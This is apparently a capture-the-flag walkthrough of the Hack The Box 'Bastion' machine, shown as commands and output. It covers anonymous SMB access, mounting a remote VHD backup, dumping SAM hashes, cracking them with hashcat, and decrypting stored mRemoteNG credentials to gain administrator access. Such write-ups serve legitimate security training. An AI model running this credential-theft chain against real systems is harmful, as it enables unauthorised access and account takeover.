Pages

Search

HTB Bastion

$nmap -A -p- -T4 10.10.10.134

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-03 08:49 CET
Nmap scan report for 10.10.10.134
Host is up (0.036s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m35s, median: 0s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-12-03T08:50:53+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-12-03T07:50:49
|_  start_date: 2020-12-03T07:47:17

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.94 seconds

Open ports:

  • 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
  • 135/tcp open msrpc Microsoft Windows RPC
  • 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  • 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
  • 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • 49664/tcp open msrpc Microsoft Windows RPC
  • 49665/tcp open msrpc Microsoft Windows RPC
  • 49666/tcp open msrpc Microsoft Windows RPC
  • 49667/tcp open msrpc Microsoft Windows RPC
  • 49668/tcp open msrpc Microsoft Windows RPC
  • 49669/tcp open msrpc Microsoft Windows RPC
  • 49670/tcp open msrpc Microsoft Windows RPC

As smb port is open, let’s check it.

$smbclient -N -L \\10.10.10.134\

Sharename       Type      Comment
--------       ----      -------
ADMIN$          Disk      Remote Admin
Backups         Disk      
C$              Disk      Default share
IPC$            IPC       Remote IPC

SMB1 disabled -- no workgroup available

We can access to Backup share.

$smbclient -N \\10.10.10.134\Backups

Try "help" to get a list of possible commands.
smb: \> dir
.                                   D        0  Tue Apr 16 12:02:11 2019
..                                  D        0  Tue Apr 16 12:02:11 2019
note.txt                           AR      116  Tue Apr 16 12:10:09 2019
SDT65CB.tmp                         A        0  Fri Feb 22 13:43:08 2019
WindowsImageBackup                 Dn        0  Fri Feb 22 13:44:02 2019

735807 blocks of size 4096. 2763904 blocks available

smb: > mget note.txt

Get file note.txt? yes
getting file \note.txt of size 116 as note.txt (0,7 KiloBytes/sec) (average 0,7 KiloBytes/sec)

smb: > cd WindowsImageBackup\
smb: \WindowsImageBackup> dir

.                                  Dn        0  Fri Feb 22 13:44:02 2019
..                                 Dn        0  Fri Feb 22 13:44:02 2019
L4mpje-PC                          Dn        0  Fri Feb 22 13:45:32 2019

7735807 blocks of size 4096. 2763904 blocks available

smb: \WindowsImageBackup> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC> dir

.                                  Dn        0  Fri Feb 22 13:45:32 2019
..                                 Dn        0  Fri Feb 22 13:45:32 2019
Backup 2019-02-22 124351           Dn        0  Fri Feb 22 13:45:32 2019
Catalog                            Dn        0  Fri Feb 22 13:45:32 2019
MediaId                            An       16  Fri Feb 22 13:44:02 2019
SPPMetadataCache                   Dn        0  Fri Feb 22 13:45:32 2019

7735807 blocks of size 4096. 2763901 blocks available

smb: \WindowsImageBackup\L4mpje-PC> cd "Backup 2019-02-22 124351\"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351> dir

.                                  Dn        0  Fri Feb 22 13:45:32 2019
..                                 Dn        0  Fri Feb 22 13:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd     An 37761024  Fri Feb 22 13:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd     An 5418299392  Fri Feb 22 13:45:32 2019
BackupSpecs.xml                    An     1186  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml     An     1078  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml     An     8930  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml     An     6542  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml     An     2894  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml     An     1488  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml     An     1484  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml     An     3844  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml     An     3988  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml     An     7110  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml     An  2374620  Fri Feb 22 13:45:32 2019

7735807 blocks of size 4096. 2763389 blocks available

We find two vhd files.

A vhd file is a Virtual Hark Disk. More information can be found on
https://en.wikipedia.org/wiki/VHD_(file_format)

As file note.txt says,

$cat note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

We can’t download these files from our local box, so we need to find a different approach.

Searching on google we find ways that help us to mount these files remotely.

https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25

https://www.jamescoyle.net/tag/qemu-nbd

$cd /mnt/
$sudo mkdir remote
$sudo mount -t cifs //10.10.10.134/Backups/ /mnt/remote/ -o rw
$cd remote/
$ls

note.txt  SDT65CB.tmp  WindowsImageBackup

$cd WindowsImageBackup/
$ls

L4mpje-PC

$cd L4mpje-PC/
$ls

'Backup 2019-02-22 124351'   Catalog   MediaId   SPPMetadataCache

$cd Backup\ 2019-02-22\ 124351/
$ls

9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
BackupSpecs.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml

$cd /mnt/
$ls

remote

$sudo mkdir vhd
$qemu-nbd -r -c /dev/nbd0 /mnt/remote/WindowsImageBackup/L4mpje-PC/"Backup 2019-02-22 124351"/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

qemu-nbd: Failed to open /dev/nbd0: No such file or directory
qemu-nbd: Disconnect client, due to: Failed to read request: Unexpected end-of-file before all bytes were read

$cd /dev/
$sudo modprobe nbd

$sudo qemu-nbd -r -c /dev/nbd0 /mnt/remote/WindowsImageBackup/L4mpje-PC/"Backup 2019-02-22 124351"/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
$sudo mount -r /dev/nbd0p1 /mnt/vhd
$cd /mnt/vhd/
$ls

'$Recycle.Bin'   autoexec.bat   config.sys  'Documents and Settings'   pagefile.sys   PerfLogs  'Program Files'   ProgramData   Recovery  'System Volume Information'   Users   Windows

$cd Users/L4mpje/Desktop
$ls

desktop.ini

There is no user flag.
Let’s perform then an in deep analysis of the Windows system.

One of the first elements to check is the Security Account Manager.
https://en.wikipedia.org/wiki/Security_Account_Manager

$ls -la

total 74740
drwxrwxrwx 1 root root    12288 feb 22  2019 .
drwxrwxrwx 1 root root   655360 feb 22  2019 ..
-rwxrwxrwx 2 root root    28672 feb 22  2019 BCD-Template
-rwxrwxrwx 2 root root    25600 feb 22  2019 BCD-Template.LOG
-rwxrwxrwx 2 root root 30932992 feb 22  2019 COMPONENTS
-rwxrwxrwx 2 root root  1048576 feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms
-rwxrwxrwx 2 root root  1048576 feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms
-rwxrwxrwx 2 root root  1048576 feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms
-rwxrwxrwx 2 root root    65536 feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf
-rwxrwxrwx 2 root root    65536 feb 22  2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf
-rwxrwxrwx 2 root root   524288 feb 22  2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
-rwxrwxrwx 2 root root   524288 jul 14  2009 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
-rwxrwxrwx 2 root root     1024 abr 12  2011 COMPONENTS.LOG
-rwxrwxrwx 2 root root   262144 feb 22  2019 COMPONENTS.LOG1
-rwxrwxrwx 2 root root        0 jul 14  2009 COMPONENTS.LOG2
-rwxrwxrwx 1 root root   262144 feb 22  2019 DEFAULT
-rwxrwxrwx 1 root root     1024 abr 12  2011 DEFAULT.LOG
-rwxrwxrwx 2 root root    91136 feb 22  2019 DEFAULT.LOG1
-rwxrwxrwx 2 root root        0 jul 14  2009 DEFAULT.LOG2
drwxrwxrwx 1 root root        0 jul 14  2009 Journal
drwxrwxrwx 1 root root        0 feb 22  2019 RegBack
-rwxrwxrwx 1 root root   262144 feb 22  2019 SAM
-rwxrwxrwx 1 root root     1024 abr 12  2011 SAM.LOG
-rwxrwxrwx 2 root root    21504 feb 22  2019 SAM.LOG1
-rwxrwxrwx 2 root root        0 jul 14  2009 SAM.LOG2
-rwxrwxrwx 1 root root   262144 feb 22  2019 SECURITY
-rwxrwxrwx 1 root root     1024 abr 12  2011 SECURITY.LOG
-rwxrwxrwx 2 root root    21504 feb 22  2019 SECURITY.LOG1
-rwxrwxrwx 2 root root        0 jul 14  2009 SECURITY.LOG2
-rwxrwxrwx 1 root root 24117248 feb 22  2019 SOFTWARE
-rwxrwxrwx 1 root root     1024 abr 12  2011 SOFTWARE.LOG
-rwxrwxrwx 2 root root   262144 feb 22  2019 SOFTWARE.LOG1
-rwxrwxrwx 2 root root        0 jul 14  2009 SOFTWARE.LOG2
-rwxrwxrwx 1 root root  9699328 feb 22  2019 SYSTEM
-rwxrwxrwx 1 root root     1024 abr 12  2011 SYSTEM.LOG
-rwxrwxrwx 2 root root   262144 feb 22  2019 SYSTEM.LOG1
-rwxrwxrwx 2 root root        0 jul 14  2009 SYSTEM.LOG2
drwxrwxrwx 1 root root     4096 nov 20  2010 systemprofile
drwxrwxrwx 1 root root     4096 feb 22  2019 TxR

We have access to SAM and SYSTEM files.
They can be used to obtain deeper access.

$samdump2 SYSTEM SAM

*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

Let’s crack L4mpje’s hash.

$hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz, 2868/2932 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

26112010952d963c8dc4217daec986d9:bureaulampje    
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: 26112010952d963c8dc4217daec986d9
Time.Started.....: Thu Dec  3 11:09:03 2020 (8 secs)
Time.Estimated...: Thu Dec  3 11:09:11 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1398.6 kH/s (0.51ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 9396224/14344385 (65.50%)
Rejected.........: 0/9396224 (0.00%)
Restore.Point....: 9394176/14344385 (65.49%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: burlfish85 -> burbank105

Started: Thu Dec  3 11:08:39 2020
Stopped: Thu Dec  3 11:09:12 2020

The password is bureaulampje.

Now we just need to access by ssh to L4mpje0’s account.

$ssh L4mpje@10.10.10.134

L4mpje@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>

l4mpje@BASTION C:\Users\L4mpje>cd Desktop
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt

9bfeXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Let’s search for our admin’s flag.

PS C:\Program Files (x86)> dir

Directory: C:\Program Files (x86)                                                                                           

Mode          LastWriteTime     Length 	Name                                                                           
----          -------------     ------ 	----                                                                           
d-----        16-7-2016     	15:23   Common Files                                                                   
d-----        23-2-2019     	09:38   Internet Explorer                                                              
d-----        16-7-2016     	15:23   Microsoft.NET                                                                  
da----        22-2-2019     	14:01   mRemoteNG                                                                      
d-----        23-2-2019     	10:22   Windows Defender                                                               
d-----        23-2-2019     	09:38   Windows Mail                                                                   
d-----        23-2-2019     	10:22   Windows Media Player                                                           
d-----        16-7-2016     	15:23   Windows Multimedia Platform                                                    
d-----        16-7-2016     	15:23   Windows NT                                                                     
d-----        23-2-2019     	10:22   Windows Photo Viewer                                                           
d-----        16-7-2016     	15:23   Windows Portable Devices                                                       
d-----        16-7-2016     	15:23   WindowsPowerShell                                                              

PS C:\Program Files (x86)>

There is an installation of mRemoteNG.

mRemoteNG is a fork of mRemote: an open source, tabbed, multi-protocol, remote connections manager for Windows. mRemoteNG adds bug fixes and new features to mRemote. It allows you to view all of your remote connections in a simple yet powerful tabbed interface.

https://mremoteng.org/

PS C:\Program Files (x86)\mRemoteNG> type .\Changelog.txt

1.76.11 (2018-10-18):                                                                                                           

Fixes:                                                                                                                          
------                                                                                                                          
#1139: Feature "Reconnect to previously opened sessions" not working                                                            
#1136: Putty window not maximized                                                                                               

1.76.10 (2018-10-07):                                                                                                           

Fixes:                                                                                                                          
------                                                                                                                          
#1124: Enabling themes causes an exception                                                                                      

1.76.9 (2018-10-07):                                                                                                            

Fixes:                                                                                                                          
------                                                                                                                          
#1117: Duplicate panel created when "Reconnect on Startup" and "Create Empty Panel" settings enabled                            
#1115: Exception when changing from xml data storage to SQL

According to this file, we have a mRemoteNG version 1.76.11

Based on this information this version is vulnerable.
https://hackersvanguard.com/mremoteng-insecure-password-storage/

$scp l4mpje@10.10.10.134:./AppData/Roaming/mRemoteNG/confCons.xml .

l4mpje@10.10.10.134's password: 
confCons.xml                                                                                                                                       100% 6316   154.2KB/s   00:00

$ls

confCons.xml  hash.txt

$cat confCons.xml

<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">

    <Node 
        Name="DC" 
        Type="Connection" 
        Descr="" Icon="mRemoteNG" 
        Panel="General" 
        Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" 
        Username="Administrator" 
        Domain="" 
        Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" 
        Hostname="127.0.0.1" 
        Protocol="RDP" 
		...

We can now decrypt the password.
https://github.com/haseebT/mRemoteNG-Decrypt

$wget https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py

--2020-12-03 12:24:53--  https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
Resolviendo raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.132.133
Conectando con raw.githubusercontent.com (raw.githubusercontent.com)[151.101.132.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 1535 (1,5K) [text/plain]
Grabando a: “mremoteng_decrypt.py”

mremoteng_decrypt.py                                              100%[=============================================================================================================================================================>]   1,50K  --.-KB/s    en 0s      

2020-12-03 12:24:53 (4,42 MB/s) - “mremoteng_decrypt.py” guardado [1535/1535]

$python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

Password: thXLHM96BeKL0ER2

The Administrator password is then thXLHM96BeKL0ER2.

Finally, we can connect as Administrator.

$ssh administrator@10.10.10.134

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>

administrator@BASTION C:\Users\Administrator>whoami

bastion\administrator

administrator@BASTION C:\Users\Administrator>cd Desktop
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt

9588XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *